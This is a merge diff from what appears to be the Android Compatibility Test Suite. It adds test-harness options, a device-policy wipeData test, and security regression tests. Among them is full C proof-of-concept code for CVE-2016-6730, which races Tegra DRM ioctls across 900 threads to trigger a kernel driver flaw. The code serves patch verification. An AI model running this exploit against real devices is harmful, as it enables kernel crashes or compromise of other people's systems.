Merge "Customize Device Suspend instruction for watches."
diff --git a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/targetprep/PreconditionPreparer.java b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/targetprep/PreconditionPreparer.java
index fc25e03..27ef658 100644
--- a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/targetprep/PreconditionPreparer.java
+++ b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/targetprep/PreconditionPreparer.java
@@ -19,14 +19,20 @@
import com.android.compatibility.common.tradefed.testtype.CompatibilityTest;
import com.android.ddmlib.Log;
import com.android.tradefed.build.IBuildInfo;
+import com.android.tradefed.config.ConfigurationException;
import com.android.tradefed.config.Option;
+import com.android.tradefed.config.OptionSetter;
import com.android.tradefed.device.DeviceNotAvailableException;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.log.LogUtil;
+import com.android.tradefed.log.LogUtil.CLog;
import com.android.tradefed.targetprep.BuildError;
import com.android.tradefed.targetprep.ITargetPreparer;
import com.android.tradefed.targetprep.TargetSetupError;
+import java.util.ArrayList;
+import java.util.List;
+
/**
* An {@link ITargetPreparer} that performs checks and/or tasks to ensure the
* the device is ready to run the test suite.
@@ -38,16 +44,38 @@
description = "Whether preconditions should be skipped")
private boolean mSkipPreconditions = false;
+ @Option(name = CompatibilityTest.PRECONDITION_ARG_OPTION,
+ description = "the arguments to pass to a precondition. The expected format is"
+ + "\"<arg-name>:<arg-value>\"")
+ private List<String> mPreconditionArgs = new ArrayList<>();
+
protected final String LOG_TAG = getClass().getSimpleName();
@Override
public void setUp(ITestDevice device, IBuildInfo buildInfo) throws TargetSetupError,
BuildError, DeviceNotAvailableException {
if (!mSkipPreconditions) {
+ for (String preconditionArg : mPreconditionArgs) {
+ String[] parts = preconditionArg.split(":");
+ String argName = parts[0];
+ // If arg-value is not supplied, set to "true"
+ String argValue = (parts.length > 1) ? parts[1] : Boolean.toString(true);
+ setOption(argName, argValue);
+ }
run(device, buildInfo);
}
}
+ private void setOption(String option, String value) {
+ try {
+ OptionSetter setter = new OptionSetter(this);
+ setter.setOptionValue(option, value);
+ } catch (ConfigurationException e) {
+ CLog.i("Value %s for option %s not applicable for class %s", value, option,
+ this.getClass().getName());
+ }
+ }
+
public abstract void run(ITestDevice device, IBuildInfo buildInfo)
throws TargetSetupError, BuildError, DeviceNotAvailableException;
diff --git a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/CompatibilityTest.java b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/CompatibilityTest.java
index 3befc47..0fbadbd 100644
--- a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/CompatibilityTest.java
+++ b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/CompatibilityTest.java
@@ -87,6 +87,7 @@
public static final String SUBPLAN_OPTION = "subplan";
public static final String MODULE_OPTION = "module";
public static final String TEST_OPTION = "test";
+ public static final String PRECONDITION_ARG_OPTION = "precondition-arg";
public static final String MODULE_ARG_OPTION = "module-arg";
public static final String TEST_ARG_OPTION = "test-arg";
public static final String RETRY_OPTION = "retry";
@@ -131,6 +132,12 @@
importance = Importance.IF_UNSET)
private String mTestName = null;
+ @Option(name = PRECONDITION_ARG_OPTION,
+ description = "the arguments to pass to a precondition. The expected format is"
+ + "\"<arg-name>:<arg-value>\"",
+ importance = Importance.ALWAYS)
+ private List<String> mPreconditionArgs = new ArrayList<>();
+
@Option(name = MODULE_ARG_OPTION,
description = "the arguments to pass to a module. The expected format is"
+ "\"<module-name>:<arg-name>:<arg-value>\"",
@@ -341,8 +348,13 @@
listener = new FailureListener(listener, getDevice(), mBugReportOnFailure,
mLogcatOnFailure, mScreenshotOnFailure, mRebootOnFailure, mMaxLogcatBytes);
int moduleCount = modules.size();
- CLog.logAndDisplay(LogLevel.INFO, "Starting %d module%s on %s", moduleCount,
- (moduleCount > 1) ? "s" : "", mDevice.getSerialNumber());
+ if (moduleCount == 0) {
+ CLog.logAndDisplay(LogLevel.INFO, "No module to run.");
+ return;
+ } else {
+ CLog.logAndDisplay(LogLevel.INFO, "Starting %d module%s on %s", moduleCount,
+ (moduleCount > 1) ? "s" : "", mDevice.getSerialNumber());
+ }
if (mRebootBeforeTest) {
CLog.d("Rebooting device before test starts as requested.");
mDevice.reboot();
@@ -374,7 +386,7 @@
module.setBuild(mBuildHelper.getBuildInfo());
module.setDevice(mDevice);
module.setPreparerWhitelist(mPreparerWhitelist);
- isPrepared &= (module.prepare(mSkipPreconditions));
+ isPrepared &= (module.prepare(mSkipPreconditions, mPreconditionArgs));
}
if (!isPrepared) {
throw new RuntimeException(String.format("Failed preconditions on %s",
diff --git a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/IModuleDef.java b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/IModuleDef.java
index e7a7039..8ddbd91 100644
--- a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/IModuleDef.java
+++ b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/IModuleDef.java
@@ -22,6 +22,7 @@
import com.android.tradefed.testtype.IRemoteTest;
import com.android.tradefed.testtype.IRuntimeHintProvider;
+import java.util.List;
import java.util.Set;
/**
@@ -66,8 +67,12 @@
/**
* Push any necessary dynamic configuration, then run the module's precondition checks
* and setup tasks.
+ * @param skipPrep whether preparation should be skipped
+ * @param preconditionArgs arguments to set on precondition preparers for the module, taking
+ * format arg-name:arg-value. If "arg-value" is unset, the value will default to "true".
* @return whether preparation succeeded.
*/
- boolean prepare(boolean skipPrep) throws DeviceNotAvailableException;
+ boolean prepare(boolean skipPrep, List<String> preconditionArgs)
+ throws DeviceNotAvailableException;
}
diff --git a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/ModuleDef.java b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/ModuleDef.java
index 035b9ea..ea6d339 100644
--- a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/ModuleDef.java
+++ b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/ModuleDef.java
@@ -255,13 +255,17 @@
* {@inheritDoc}
*/
@Override
- public boolean prepare(boolean skipPrep) throws DeviceNotAvailableException {
+ public boolean prepare(boolean skipPrep, List<String> preconditionArgs)
+ throws DeviceNotAvailableException {
for (ITargetPreparer preparer : mDynamicConfigPreparers) {
runPreparerSetup(preparer);
}
for (ITargetPreparer preparer : mPreconditions) {
setOption(preparer, CompatibilityTest.SKIP_PRECONDITIONS_OPTION,
Boolean.toString(skipPrep));
+ for (String preconditionArg : preconditionArgs) {
+ setOption(preparer, CompatibilityTest.PRECONDITION_ARG_OPTION, preconditionArg);
+ }
try {
runPreparerSetup(preparer);
} catch (RuntimeException e) {
diff --git a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/ModuleRepo.java b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/ModuleRepo.java
index c7b6999..8b72acf 100644
--- a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/ModuleRepo.java
+++ b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/ModuleRepo.java
@@ -440,7 +440,9 @@
public List<IModuleDef> getModules(String serial, int shardIndex) {
Collections.sort(mNonTokenModules, new ExecutionOrderComparator());
List<IModuleDef> modules = getShard(mNonTokenModules, shardIndex, mTotalShards);
-
+ if (modules == null) {
+ return new ArrayList<IModuleDef>();
+ }
long estimatedTime = 0;
for (IModuleDef def : modules) {
estimatedTime += def.getRuntimeHint();
@@ -478,6 +480,9 @@
*/
protected List<IModuleDef> getShard(List<IModuleDef> fullList, int shardIndex, int totalShard) {
List<List<IModuleDef>> res = LinearPartition.split(fullList, totalShard);
+ if (res.isEmpty()) {
+ return null;
+ }
return res.get(shardIndex);
}
diff --git a/common/host-side/tradefed/tests/src/com/android/compatibility/common/tradefed/testtype/CompatibilityTestTest.java b/common/host-side/tradefed/tests/src/com/android/compatibility/common/tradefed/testtype/CompatibilityTestTest.java
index be715d2..415aa40 100644
--- a/common/host-side/tradefed/tests/src/com/android/compatibility/common/tradefed/testtype/CompatibilityTestTest.java
+++ b/common/host-side/tradefed/tests/src/com/android/compatibility/common/tradefed/testtype/CompatibilityTestTest.java
@@ -20,6 +20,7 @@
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.log.ITestLogger;
import com.android.tradefed.result.ByteArrayInputStreamSource;
+import com.android.tradefed.result.ITestInvocationListener;
import com.android.tradefed.result.InputStreamSource;
import com.android.tradefed.result.LogDataType;
import com.android.tradefed.suite.checker.ISystemStatusChecker;
@@ -44,6 +45,7 @@
private CompatibilityTest mTest;
private ITestDevice mMockDevice;
private ITestLogger mMockLogger;
+ private ITestInvocationListener mMockListener;
@Override
public void setUp() throws Exception {
@@ -56,6 +58,7 @@
mMockDevice = EasyMock.createMock(ITestDevice.class);
mTest.setDevice(mMockDevice);
mMockLogger = EasyMock.createMock(ITestLogger.class);
+ mMockListener = EasyMock.createMock(ITestInvocationListener.class);
}
/**
@@ -233,7 +236,7 @@
* Test {@link CompatibilityTest#runPostModuleCheck(String, List, ITestDevice, ITestLogger)}
* is successful when no system checker fails.
*/
- public void testrunPostModuleCheck() throws Exception {
+ public void testRunPostModuleCheck() throws Exception {
List<ISystemStatusChecker> systemCheckers = new ArrayList<>();
// add 2 inop status checkers.
systemCheckers.add(new ISystemStatusChecker() {});
@@ -247,7 +250,7 @@
* Test {@link CompatibilityTest#runPreModuleCheck(String, List, ITestDevice, ITestLogger)}
* is failing and log the failure.
*/
- public void testrunPostModuleCheck_failure() throws Exception {
+ public void testRunPostModuleCheck_failure() throws Exception {
List<ISystemStatusChecker> systemCheckers = new ArrayList<>();
// add 2 inop status checkers.
systemCheckers.add(new ISystemStatusChecker() {});
@@ -267,4 +270,26 @@
mTest.runPostModuleCheck("FAKE_MODULE", systemCheckers, mMockDevice, mMockLogger);
EasyMock.verify(mMockDevice, mMockLogger);
}
+
+ /**
+ * Test {@link CompatibilityTest#run(ITestInvocationListener)} returns with no further
+ * execution when there is no module to run.
+ */
+ public void testRun_noModules() throws Exception {
+ mTest = new CompatibilityTest(1, new ModuleRepo() {
+ @Override
+ public boolean isInitialized() {
+ return true;
+ }
+ @Override
+ public List<IModuleDef> getModules(String serial, int shardIndex) {
+ return new ArrayList<IModuleDef>();
+ }
+ }, 0);
+ mTest.setDevice(mMockDevice);
+ EasyMock.expect(mMockDevice.getSerialNumber()).andReturn("FAKE_SERIAL");
+ EasyMock.replay(mMockDevice, mMockListener);
+ mTest.run(mMockListener);
+ EasyMock.verify(mMockDevice, mMockListener);
+ }
}
diff --git a/common/host-side/tradefed/tests/src/com/android/compatibility/common/tradefed/testtype/ModuleRepoTest.java b/common/host-side/tradefed/tests/src/com/android/compatibility/common/tradefed/testtype/ModuleRepoTest.java
index e8cece4..f341823 100644
--- a/common/host-side/tradefed/tests/src/com/android/compatibility/common/tradefed/testtype/ModuleRepoTest.java
+++ b/common/host-side/tradefed/tests/src/com/android/compatibility/common/tradefed/testtype/ModuleRepoTest.java
@@ -252,6 +252,20 @@
checkArgs(module);
}
+ /**
+ * Test that {@link ModuleRepo#getModules(String, int)} handles well all module being filtered.
+ */
+ public void testFiltering_empty() throws Exception {
+ Set<String> includeFilters = new HashSet<>();
+ Set<String> excludeFilters = new HashSet<>();
+ excludeFilters.add(MODULE_NAME_A);
+ excludeFilters.add(MODULE_NAME_B);
+ mRepo.initialize(1, null, mTestsDir, ABIS, DEVICE_TOKENS, TEST_ARGS, MODULE_ARGS,
+ includeFilters, excludeFilters, mMockBuildInfo);
+ List<IModuleDef> modules = mRepo.getModules(SERIAL1, 0);
+ assertEquals("Incorrect number of modules", 0, modules.size());
+ }
+
public void testParsing() throws Exception {
mRepo.initialize(1, null, mTestsDir, ABIS, DEVICE_TOKENS, TEST_ARGS, MODULE_ARGS, INCLUDES,
EXCLUDES, mMockBuildInfo);
diff --git a/hostsidetests/devicepolicy/app/CorpOwnedManagedProfile/res/xml/device_admin.xml b/hostsidetests/devicepolicy/app/CorpOwnedManagedProfile/res/xml/device_admin.xml
index ff086d6..2b19ff6 100644
--- a/hostsidetests/devicepolicy/app/CorpOwnedManagedProfile/res/xml/device_admin.xml
+++ b/hostsidetests/devicepolicy/app/CorpOwnedManagedProfile/res/xml/device_admin.xml
@@ -1,4 +1,5 @@
<device-admin xmlns:android="http://schemas.android.com/apk/res/android" android:visible="false">
<uses-policies>
+ <wipe-data/>
</uses-policies>
</device-admin>
diff --git a/hostsidetests/devicepolicy/app/CorpOwnedManagedProfile/src/com/android/cts/comp/ManagementTest.java b/hostsidetests/devicepolicy/app/CorpOwnedManagedProfile/src/com/android/cts/comp/ManagementTest.java
index 2a35699..304cfcc 100644
--- a/hostsidetests/devicepolicy/app/CorpOwnedManagedProfile/src/com/android/cts/comp/ManagementTest.java
+++ b/hostsidetests/devicepolicy/app/CorpOwnedManagedProfile/src/com/android/cts/comp/ManagementTest.java
@@ -58,9 +58,7 @@
public void testOtherProfilesEqualsBindTargetUsers() {
UserHandle otherProfile = Utils.getOtherProfile(mContext);
- DevicePolicyManager dpm = (DevicePolicyManager)
- mContext.getSystemService(Context.DEVICE_POLICY_SERVICE);
- List<UserHandle> allowedTargetUsers = dpm.getBindDeviceAdminTargetUsers(
+ List<UserHandle> allowedTargetUsers = mDevicePolicyManager.getBindDeviceAdminTargetUsers(
AdminReceiver.getComponentName(mContext));
assertEquals(1, allowedTargetUsers.size());
@@ -76,4 +74,8 @@
assertFalse(mDevicePolicyManager.isProvisioningAllowed(
DevicePolicyManager.ACTION_PROVISION_MANAGED_PROFILE));
}
+
+ public void testWipeData() {
+ mDevicePolicyManager.wipeData(0);
+ }
}
diff --git a/hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/BaseDevicePolicyTest.java b/hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/BaseDevicePolicyTest.java
index fbf6d26..d2b8d25 100644
--- a/hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/BaseDevicePolicyTest.java
+++ b/hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/BaseDevicePolicyTest.java
@@ -36,6 +36,7 @@
import java.util.HashSet;
import java.util.Map;
import java.util.Set;
+import java.util.concurrent.TimeUnit;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
@@ -53,6 +54,9 @@
protected static final int USER_OWNER = 0;
+ private static final long TIMEOUT_USER_REMOVED_MILLIS = TimeUnit.SECONDS.toMillis(15);
+ private static final long WAIT_SAMPLE_INTERVAL_MILLIS = 200;
+
// From the UserInfo class
protected static final int FLAG_PRIMARY = 0x00000001;
protected static final int FLAG_GUEST = 0x00000004;
@@ -618,4 +622,27 @@
CLog.d("Output for command " + command + ": " + result);
return result;
}
+
+ protected interface SuccessCondition {
+ boolean check() throws Exception;
+ }
+
+ protected void assertUserGetsRemoved(int userId) throws Exception {
+ tryWaitForSuccess(() -> !listUsers().contains(userId),
+ "The user " + userId + " has not been removed",
+ TIMEOUT_USER_REMOVED_MILLIS
+ );
+ }
+
+ protected void tryWaitForSuccess(SuccessCondition successCondition, String failureMessage,
+ long timeoutMillis) throws Exception {
+ long epoch = System.currentTimeMillis();
+ while (System.currentTimeMillis() - epoch <= timeoutMillis) {
+ Thread.sleep(WAIT_SAMPLE_INTERVAL_MILLIS);
+ if (successCondition.check()) {
+ return;
+ }
+ }
+ fail(failureMessage);
+ }
}
diff --git a/hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/DeviceOwnerPlusManagedProfileTest.java b/hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/DeviceOwnerPlusManagedProfileTest.java
index 0b24c36..6fade14 100644
--- a/hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/DeviceOwnerPlusManagedProfileTest.java
+++ b/hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/DeviceOwnerPlusManagedProfileTest.java
@@ -270,6 +270,22 @@
mPrimaryUserId);
}
+ public void testWipeData() throws Exception {
+ if (!mHasFeature) {
+ return;
+ }
+ setupManagedProfile(COMP_DPC_APK, COMP_DPC_PKG, COMP_DPC_ADMIN);
+ addDisallowRemoveManagedProfileRestriction();
+ // The PO of the managed profile should be allowed to delete the managed profile, even
+ // though the disallow remove profile restriction is set.
+ runDeviceTestsAsUser(
+ COMP_DPC_PKG,
+ MANAGEMENT_TEST,
+ "testWipeData",
+ mProfileUserId);
+ assertUserGetsRemoved(mProfileUserId);
+ }
+
protected void setupManagedProfile(String apkName, String packageName,
String adminReceiverClassName) throws Exception {
// Temporary disable the DISALLOW_ADD_MANAGED_PROFILE, so that we can create profile
diff --git a/hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/ManagedProfileTest.java b/hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/ManagedProfileTest.java
index e8fdb30..5f5b319 100644
--- a/hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/ManagedProfileTest.java
+++ b/hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/ManagedProfileTest.java
@@ -73,8 +73,7 @@
private static final String ADD_RESTRICTION_COMMAND = "add-restriction";
- private static final long WAIT_TIMEOUT_MILLIS = TimeUnit.SECONDS.toMillis(15);
- private static final long WAIT_SAMPLE_INTERVAL_MILLIS = TimeUnit.SECONDS.toMillis(1);
+ private static final long TIMEOUT_USER_LOCKED_MILLIS = TimeUnit.SECONDS.toMillis(15);
private int mParentUserId;
@@ -138,8 +137,7 @@
MANAGED_PROFILE_PKG, MANAGED_PROFILE_PKG + ".WipeDataTest", mProfileUserId);
// Note: the managed profile is removed by this test, which will make removeUserCommand in
// tearDown() to complain, but that should be OK since its result is not asserted.
- tryWaitForSuccess(() -> !listUsers().contains(mProfileUserId),
- "The managed profile has not been removed after calling wipeData");
+ assertUserGetsRemoved(mProfileUserId);
}
public void testLockNowWithKeyEviction() throws Exception {
@@ -150,27 +148,16 @@
"testLockNowWithKeyEviction", mProfileUserId);
final String cmd = "dumpsys activity | grep 'User #" + mProfileUserId + ": state='";
final Pattern p = Pattern.compile("state=([\\p{Upper}_]+)$");
- tryWaitForSuccess(() -> {
+ SuccessCondition userLocked = () -> {
final String activityDump = getDevice().executeShellCommand(cmd);
final Matcher m = p.matcher(activityDump);
return m.find() && m.group(1).equals("RUNNING_LOCKED");
- }, "The managed profile has not been locked after calling lockNow(FLAG_SECURE_USER_DATA)");
- }
-
- private interface SuccessCondition {
- boolean check() throws Exception;
- }
-
- private void tryWaitForSuccess(SuccessCondition successCondition, String failureMessage)
- throws Exception {
- long epoch = System.currentTimeMillis();
- while (System.currentTimeMillis() - epoch <= WAIT_TIMEOUT_MILLIS) {
- Thread.sleep(WAIT_SAMPLE_INTERVAL_MILLIS);
- if (successCondition.check()) {
- return;
- }
- }
- fail(failureMessage);
+ };
+ tryWaitForSuccess(
+ userLocked,
+ "The managed profile has not been locked after calling "
+ + "lockNow(FLAG_SECURE_USER_DATA)",
+ TIMEOUT_USER_LOCKED_MILLIS);
}
public void testMaxOneManagedProfile() throws Exception {
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index 3f3894b..cd68c69 100644
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -16,7 +16,34 @@
<configuration description="Config for the CTS Security host tests">
<target_preparer class="com.android.compatibility.common.tradefed.targetprep.FilePusher">
<option name="cleanup" value="true" />
+ <option name="push" value="CVE-2016-8412->/data/local/tmp/CVE-2016-8412" />
+ <option name="push" value="CVE-2016-8444->/data/local/tmp/CVE-2016-8444" />
+ <option name="push" value="CVE-2016-8448->/data/local/tmp/CVE-2016-8448" />
+ <option name="push" value="CVE-2016-8449->/data/local/tmp/CVE-2016-8449" />
+ <option name="push" value="CVE-2016-8460->/data/local/tmp/CVE-2016-8460" />
+ <option name="push" value="CVE-2017-0403->/data/local/tmp/CVE-2017-0403" />
+ <option name="push" value="CVE-2017-0404->/data/local/tmp/CVE-2017-0404" />
+ <option name="push" value="CVE-2016-8482->/data/local/tmp/CVE-2016-8482" />
+ <option name="push" value="CVE-2017-0429->/data/local/tmp/CVE-2017-0429" />
+ <option name="push" value="CVE-2016-6730->/data/local/tmp/CVE-2016-6730" />
+ <option name="push" value="CVE-2016-6731->/data/local/tmp/CVE-2016-6731" />
+ <option name="push" value="CVE-2016-6732->/data/local/tmp/CVE-2016-6732" />
+ <option name="push" value="CVE-2016-6733->/data/local/tmp/CVE-2016-6733" />
+ <option name="push" value="CVE-2016-6734->/data/local/tmp/CVE-2016-6734" />
+ <option name="push" value="CVE-2016-6735->/data/local/tmp/CVE-2016-6735" />
+ <option name="push" value="CVE-2016-6736->/data/local/tmp/CVE-2016-6736" />
+ <option name="push" value="CVE-2016-8424->/data/local/tmp/CVE-2016-8424" />
+ <option name="push" value="CVE-2016-8425->/data/local/tmp/CVE-2016-8425" />
+ <option name="push" value="CVE-2016-8426->/data/local/tmp/CVE-2016-8426" />
+ <option name="push" value="CVE-2016-8427->/data/local/tmp/CVE-2016-8427" />
+ <option name="push" value="CVE-2016-8428->/data/local/tmp/CVE-2016-8428" />
+ <option name="push" value="CVE-2016-8429->/data/local/tmp/CVE-2016-8429" />
<option name="push" value="CVE-2016-8430->/data/local/tmp/CVE-2016-8430" />
+ <option name="push" value="CVE-2016-8431->/data/local/tmp/CVE-2016-8431" />
+ <option name="push" value="CVE-2016-8432->/data/local/tmp/CVE-2016-8432" />
+ <option name="push" value="CVE-2016-8434->/data/local/tmp/CVE-2016-8434" />
+ <option name="push" value="CVE-2016-8435->/data/local/tmp/CVE-2016-8435" />
+ <option name="push" value="CVE-2016-9120->/data/local/tmp/CVE-2016-9120" />
<option name="append-bitness" value="true" />
</target_preparer>
<test class="com.android.compatibility.common.tradefed.testtype.JarHostTest" >
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6730/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6730/Android.mk
new file mode 100644
index 0000000..14337ab
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6730/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6730
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6730/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6730/poc.c
new file mode 100644
index 0000000..bfcdb41
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6730/poc.c
@@ -0,0 +1,164 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define CLK_THREAD_NUM 900
+#define TRY_TIMES CLK_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_GET_CLK_CONSTRAINT 0x12
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_constraint {
+ __u64 context;
+ __u32 index;
+ __u32 type;
+ __u32 rate;
+ __u32 pad;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_GET_CLK_CONSTRAINT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_GET_CLK_CONSTRAINT, struct drm_tegra_constraint)
+int fd;
+pthread_t clk_thread_id[CLK_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_constraint clk_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* clk_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_GET_CLK_CONSTRAINT, &clk_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create clk thread */
+ for(i = 0; i < CLK_THREAD_NUM; i++){
+ ret = pthread_create(clk_thread_id + i, NULL, clk_thread, NULL);
+ if(ret){
+ goto out_clk_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set clk */
+ clk_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+
+out_clk_thread:
+ /* kill clk thread */
+ for(i = 0; i < CLK_THREAD_NUM; i++){
+ pthread_kill(clk_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6731/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6731/Android.mk
new file mode 100644
index 0000000..718dbe3
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6731/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
